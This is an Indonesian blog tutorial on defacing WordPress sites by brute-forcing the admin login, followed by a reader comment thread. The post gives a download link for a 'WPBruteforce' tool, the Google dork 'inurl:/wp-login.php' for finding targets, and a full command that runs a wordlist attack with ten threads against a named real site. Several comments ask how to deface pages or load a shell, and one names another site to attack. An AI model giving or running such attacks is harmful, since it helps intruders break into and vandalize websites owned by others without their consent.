Cara Mudah Deface Wordpress Site Dengan WP Bruteforce

Onix AQua 2:20 PM

UPDATE: Link sudah diperbaiki... :)

Salam Sobat,, ;)


Hajiahh,, dini hari kagak ngapa2in neh, ga bisa tidur :3 tapi ga apa apa dah, setidaknya bisa membuat Tutorial yang berguna buat sobat semua ^_^ langsung dah disimak yooo.. ;)

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Pertama Download Bahan-Bahannya:

WPBruteforce


Password: http://indocyberarmy.blogspot.com

Dork: inurl:/wp-login.php

Yup, saatnya kita beraksi.. :)

Live Target: http://live-target.pusku.com/

Pertama, Extract File yg didownload tadi di Directori C: sehingga posisi menajdi C:\WPBrute


Lalu buka comand dengan cara : Klik Start>Run>ketik cmd


Biasanya posisi default directories di Cmd : C:\User\User_Name>
Ubah posisi directori dgn cara: ketik cd.. trus enter!

ex:
C:\User\User_Name>cd..
C:\User>cd..
C:\>
 Lalu  setelah itu masukkan perintah C:\>cd WPBrute lalu tekan enter! 



Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!


Lalu masukkan perintah: WPBforce.exe -url=http://www.tvbba.nl -user=admin -pass=wordlist.txt -threads=10



Lalu tekan enter!

Tunggu proses hingga selesai!



Wew! Berhasil tuh! wkwkwk Mantap! :p

Langsung Login dah!




GoodLuck!! :D

Content Created By Onix AQua


 tag : cara deface wordpress, brute attack wordpress, deface website mudah

Tags:

Post a Comment

68 Comments

  1. Problem ChildMarch 7, 2013 at 2:31 PM

    nais broh... :v

    ReplyDelete
  2. UnknownMarch 7, 2013 at 3:20 PM

    kwokwokwokwokwokwok

    ReplyDelete
  3. WilLyMarch 7, 2013 at 4:14 PM

    keren dah..

    ReplyDelete
  4. Tams TamsMarch 13, 2013 at 2:44 AM

    om.,.
    gak bisa
    gagal trus waktu d scan

    ReplyDelete
  5. AnonymousMarch 13, 2013 at 10:13 PM

    bro koq ada tulisan [ERRO] Arquivo de WordList nao existe!
    gmana tolong bantu

    ReplyDelete
  6. UnknownMarch 19, 2013 at 3:02 AM

    WPBrute.exe nya kg bisa di buka =="

    ReplyDelete
  7. AIMAGUMarch 21, 2013 at 6:52 AM

    Cara ini tidak mungkin bisa di pakai.
    Ini hanya program random password sederhana. Tidak mengecek ke serverweb.

    ReplyDelete
    Replies
    1. Onix AQuaMarch 24, 2013 at 2:07 AM

      bisa om,, tergantung ma wordlist passwordnya... :D

      Delete
    2. New WorldDecember 14, 2013 at 8:39 AM

      kemgkinan bisa nya kecil apa lagi di liat dari tutorial ni lama bgt pasti cara pncegahan jg udh byk beredar
      aplikasi cuma nebak 1per1 user_id dan password sesuai isi wordlist
      bkan mencari tau password sbenarnya

      Delete
  8. JOK3R !March 25, 2013 at 6:13 AM

    Oh. onix yang ngurus blog ini, perasaan pernah denger ._.
    mau nanya..


    jelasin dong yg tiga dibawah ini
    "-user=admin -pass=wordlist.txt -threads=10"

    apakah ini fix, atau perlu diganti2? .__.

    ReplyDelete
  9. Lathifatul AfifahApril 5, 2013 at 10:17 AM

    Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!

    yg diatas ane bingung -_-

    ReplyDelete
  10. Lathifatul AfifahApril 5, 2013 at 10:18 AM

    Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!

    yg diatas ane bingung -_-

    ReplyDelete
  11. AnonymousApril 9, 2013 at 3:44 AM

    Om klo settingan CMDnya kyk gini gimana?
    C:\Documents and Settings\UserXP>
    saya coba terus cd.. kaga bisa adanya yg muncul
    The System Cannot Find The Path Specified.
    lalu saya juga coba langsung
    C:\Documents and Settings\UserXP>cd.. WPBrute
    kaga bisa jga bro yg muncul sm jga bro The System .....

    ReplyDelete
    Replies
    1. Onix AQuaApril 23, 2013 at 2:54 PM

      klo ga bsa di C:\ gunakan partisi yg lain, misal D:\
      letakkan file di D:\ dan di terminal utk pindah partisi cukup ketik D: lalu enter.. :)

      Delete
  12. UnknownApril 12, 2013 at 6:25 AM

    good share gan

    ReplyDelete
  13. AnonymousApril 12, 2013 at 10:25 AM

    long live for you

    ReplyDelete
  14. e-PadiApril 22, 2013 at 12:54 AM

    Kalo cara jahil nya udah di jelaskan disini, nah.. bagaimana dengan langkah cara pencegahan bagi teman2 yang menggunakan WP sebagai CMS websitenya. Mengingat WP adalah salah satu cms favorit anak2 indonesia.

    ditunggu sharing berikutnya bro.

    ReplyDelete
    Replies
    1. Onix AQuaApril 23, 2013 at 2:52 PM

      pencegahannya simple aja kok om, gunakan password dengan kombinasi yg sangat rumit.. :D

      mksih udah mampir om :D

      Delete
  15. M. Ilham SyaputraMay 2, 2013 at 11:42 AM

    om scannya emang lama ya??

    ReplyDelete
  16. UnknownMay 8, 2013 at 7:26 AM

    Omm...
    Waktu d Scan kok ada bacaan "wordpress nao foi detectado" itu gimana gan??

    ReplyDelete
  17. Rizky A.K.A MonzaNymouzMay 9, 2013 at 4:34 AM

    Binggung Pas Mbuka nya

    ReplyDelete
  18. AnonymousMay 14, 2013 at 1:12 AM

    gan...
    kok dari notepad pas ane download wpbrute nya???
    emang notepad(default) ya?

    ReplyDelete
  19. AnonymousMay 17, 2013 at 7:21 PM

    pas buka CMD tampilannya bukan kaya gini
    ex:
    C:\User\User_Name>cd..
    C:\User>cd..
    C:\>

    jadi bingung caranya gimana

    ReplyDelete
  20. AnonymousMay 18, 2013 at 6:10 AM

    ndownload WPBruteforcenya bingung gan

    ReplyDelete
  21. AnonymousMay 18, 2013 at 6:18 AM

    link WPBruteforce-nya expired gan

    ReplyDelete
  22. AnonymousMay 19, 2013 at 11:36 PM

    password nya apa itu ?? :>)

    ReplyDelete
  23. UnknownMay 25, 2013 at 11:47 PM

    Link Error Boz

    ReplyDelete
  24. AnonymousMay 28, 2013 at 5:15 AM

    Om link nya mati ;((

    ReplyDelete
  25. UnknownJune 1, 2013 at 5:53 PM

    link baru donk gan

    ReplyDelete
  26. UnknownJune 2, 2013 at 8:22 PM

    mangstap ane coba dolo ya 8-)

    ReplyDelete
  27. premaninternetJune 5, 2013 at 10:44 AM

    Blog yg BERMUTU !!!cara ganti link target gmna om ?it dah standarkah ? 8-)

    ReplyDelete
  28. premaninternetJune 5, 2013 at 10:54 AM

    wedew,,,No consequiu craquerar!!! ;((

    ReplyDelete
  29. UnknownJune 14, 2013 at 9:08 AM

    Ane Coba dulu omm x-) semoga berhasil :-b :))

    ReplyDelete
  30. DyffaJuly 1, 2013 at 5:15 AM

    ex:
    C:\User\User_Name>cd..
    C:\User>cd..
    C:\>cd WPBrute
    C:\WPBrute>cd WPBrute
    C:\WPBrute\WPBrute>WPBforce.exe
    biar bs.. :-b :-b

    ReplyDelete
  31. ADMINJuly 1, 2013 at 10:49 AM

    lama bnar scannya gan,,,,,,,,, x-)

    ReplyDelete
  32. UnknownJuly 1, 2013 at 11:24 AM

    yua lamaaaaaaaaaa

    ReplyDelete
  33. UnknownJuly 9, 2013 at 1:12 PM

    eh papa onix :-) dicariin mama Cut tuh :>)

    ReplyDelete
  34. UnknownJuly 13, 2013 at 9:36 AM

    C:\User\User_Name>cd..
    C:\User>cd..
    C:\>cd


    kalo pada bingung pake cara diatas, ada cara yang lebih simple kok buat buka WPBforce-nya.
    >> Buka folder WPBorce
    >> tekan SHIFT + Klik Kanan secara bersamman ke isi folder (jangan nyentuh file ya :-) )
    >> klik yang tulisannya "open command windows here"
    >> step terakhir, ketik WPBforce.exe
    >> Happy hacking guys! :-d

    ReplyDelete
  35. UnknownJuly 28, 2013 at 7:04 PM

    Om Onix itu ada kesalah kecil dalam penulisan yang ini :
    -Buka file dengan mengetik perintah: WPBorce.exe maka Akan muncul tampilan seperti gambar!
    seharusnya
    - Buka file dengan mengetik perintah: WPBforce.exe maka Akan muncul tampilan seperti gambar!
    .. Hanya kurang huruf f

    ReplyDelete
  36. AnonymousJuly 29, 2013 at 1:48 PM

    belum pernah tembus :D

    [ERRO] Wordpress Nao Foi Detectado

    pencerahan nya bang :D

    ReplyDelete
    Replies
    1. AJuly 31, 2013 at 6:33 PM

      itu wordpressnya berarti gak Vuln gan :v

      Delete
  37. UnknownAugust 2, 2013 at 1:37 AM

    All Kalau Mau Ngeliatnya Make Beginian

    wordlist.txt -_-

    ReplyDelete
  38. UnknownAugust 6, 2013 at 12:03 AM

    Gan Onix gmn masukin scip deface tampilannya ke websitenya?????????? (m)

    ReplyDelete
  39. CardiSeptember 19, 2013 at 10:55 PM

    untuk perintah yg terakhir, jika si empunya web ngasih usernya bukan admin, apa masih bisa perintah -user:admin dipake? wordpress sekarang kan pas pertama instalasi bisa ngisi user untuk admin nya mau apa aja bebas, tidak harus admin.

    ReplyDelete
    Replies
    1. CardiSeptember 19, 2013 at 10:57 PM

      ada 1 web yg pengen aku uprek2, http://www.gebyarpoin777.com/ udah banyak orang yg ketipu. ane cuma ingin mengurangi jumlah orang yg tertipu aja.

      Delete
  40. wongndesoOctober 15, 2013 at 10:00 PM

    om minta wordlist.txt-nya dong

    ReplyDelete
  41. RrttrtOctober 18, 2013 at 12:37 PM

    keren om..
    ijin nyoba ya om

    ReplyDelete
  42. AdminOctober 31, 2013 at 5:08 AM

    gagal 100%,,,

    ReplyDelete
  43. Romi Bia SantoNovember 1, 2013 at 4:20 AM

    gan kalau gini gimana gan http://prntscr.com/215spc
    dan satu lagi apakah ada dork selain dork itu ?

    ReplyDelete
  44. SerizorNovember 3, 2013 at 1:21 PM

    bang klo mau ganti indexnya gimana? :d

    ReplyDelete
  45. UnknownNovember 20, 2013 at 1:29 PM

    mm...
    Waktu d Scan kok ada bacaan "wordpress nao foi detectado" itu gimana gan??
    balas yah om...!!!!!?????

    ReplyDelete
  46. UnknownDecember 2, 2013 at 8:27 PM

    @-) Klo Selain Wordprees Misalnya Blogspot Bisa Kga :-s

    ReplyDelete
  47. Dwiky Aprian AshariJanuary 2, 2014 at 6:09 AM

    Scannya Lama Bener Ya @-) :>)

    ReplyDelete
  48. UnknownJanuary 11, 2014 at 11:15 PM

    Bang Tanya cara tampilin shellnya di firefox gmana gan ? ane newbie banget

    ReplyDelete
  49. UnknownFebruary 11, 2014 at 10:30 PM

    ini knp sob ? udh coba WPBforce.exe -url= -user -pass blablbalba trs kok gini? " 'WPBforce.exe' is not recognized as an internal or external command,operable program or batch file. " http://prntscr.com/2rqop5

    ReplyDelete
  50. SyafiqMay 3, 2014 at 12:51 AM

    pass nya apa? idca kgk bsa :/

    ReplyDelete
  51. UnknownOctober 2, 2015 at 12:48 PM

    om mau nanya,, waktu scan kok aq error ya..?? itu kenapa

    ReplyDelete
  52. BataraApril 23, 2016 at 2:48 AM

    wordlistnya kurang banyak gans

    ReplyDelete
  53. Kukuh SetiawanMay 19, 2016 at 4:25 AM

    ini cuma yang nama usernamenya : admin
    kalau username lain gak bisa,

    intinya aplikasi ini buat nebak password, username pikirin sendiri

    ReplyDelete
  54. Muhammad FathurJuly 10, 2016 at 7:13 AM

    Laptop jadi Hangus gara gara Panas nya super over Heating Jebol dah HDD guaa ;((

    ReplyDelete